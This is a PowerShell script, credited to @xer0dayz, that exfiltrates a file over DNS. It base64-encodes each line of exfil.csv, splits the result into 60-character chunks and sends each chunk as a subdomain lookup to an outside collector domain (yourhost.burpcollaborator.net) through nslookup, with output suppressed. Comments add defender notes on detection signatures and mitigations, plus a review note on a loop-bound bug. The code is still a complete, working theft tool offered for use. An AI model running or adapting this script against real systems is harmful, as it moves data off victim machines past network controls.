# ExfilDataStreamDNS.ps1 by @xer0dayz - https://xerosecurity.com
#
# This script will exfil the entire contents of a file via base64 encoded strings to a custom DNS server.
#
# Update exfil.csv with the filename to exfil
# Update $dnsserver var with DNS server to use
#
# Flow, as written below: each line of exfil.csv is UTF-16LE encoded, base64 encoded,
# split into 60-character pieces, and every piece is issued as the leftmost label of a
# DNS lookup under $dnsserver, bracketed by "start.<dnsserver>" and "end.<dnsserver>".
#
# Defender notes (what this pattern looks like on the wire and on the host):
#   - Bursts of lookups to one registered domain whose leftmost label is up to 60 chars
#     drawn from the base64 alphabet, with "=" padding rewritten as "00" ("+" and "/"
#     are left untouched by the code below).
#   - "start." and "end." marker lookups frame each line of the source file.
#   - Every lookup goes through an external nslookup process, so repeated process
#     creation by the PowerShell host is observable alongside the DNS telemetry.
#   - Mitigation/detection: alert on high volumes of long, high-entropy leftmost labels
#     under a single domain; restrict outbound DNS to approved resolvers.
#
# Lines of the file to send; one start..end framed sequence is produced per line.
$lines = Get-Content .\exfil.csv
# Domain whose resolver receives the lookups; the data travels in the leftmost label.
$dnsserver = "yourhost.burpcollaborator.net"
foreach ($line in $lines){
echo "Line: $line"
# .NET "Unicode" is UTF-16LE, so every ASCII character becomes two bytes before
# base64 encoding; the encoded text is therefore roughly 2.7x the line length.
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($line)
$EncodedText =[Convert]::ToBase64String($Bytes)
echo "EncodedText: $EncodedText"
$EncodedTextLength = $EncodedText.length
echo "EncodedTextLength: $EncodedTextLength"
# $i: offset into $EncodedText of the next chunk.
$i = 0
# $pos is assigned here but not referenced anywhere below.
$pos = 0
# Chunk size in characters; a single DNS label is limited to 63 octets.
$buff = 60
echo "Start ==============================================="
# Framing lookup: marks the beginning of this line's chunks on the receiving resolver.
nslookup start.$dnsserver | out-null 2> $null
# NOTE(review): the bound is -le, not -lt. When the encoded length is 0 or an exact
# multiple of 60 this appears to run one extra iteration with $diff = 0, yielding an
# empty chunk and a lookup of ".<dnsserver>". Left unchanged here.
While ($i -le $EncodedTextLength) {
$diff = $EncodedTextLength - $i
# Remainder shorter than one chunk: take everything left after offset $i.
if($diff -lt $buff){
$EncodedTextStream = $EncodedText.substring($i,$diff)
}
# At least a full chunk remains ($diff >= 60): take exactly $buff characters.
if($diff -gt $buff-1){
$diff_end = $buff
$EncodedTextStreamSubString = $EncodedText.substring($i,$diff_end)
$EncodedTextStream = $EncodedTextStreamSubString
}
# Base64 "=" padding is rewritten as "00", presumably because "=" is not a valid
# hostname character; no other characters are rewritten.
$EncodedTextStream = $EncodedTextStream -replace '=','00' 2> $null
echo "Full DNS: $EncodedTextStream.$dnsserver"
# The data-bearing lookup: <chunk>.<dnsserver>. Output and errors are discarded.
nslookup "$EncodedTextStream.$dnsserver" | out-null 2> $null
# Advance by a full chunk even on the final partial chunk; the loop then ends.
$i = $i+$buff
}
echo "End ==============================================="
# Framing lookup: marks the end of this line's chunks.
nslookup end.$dnsserver | out-null 2> $null
}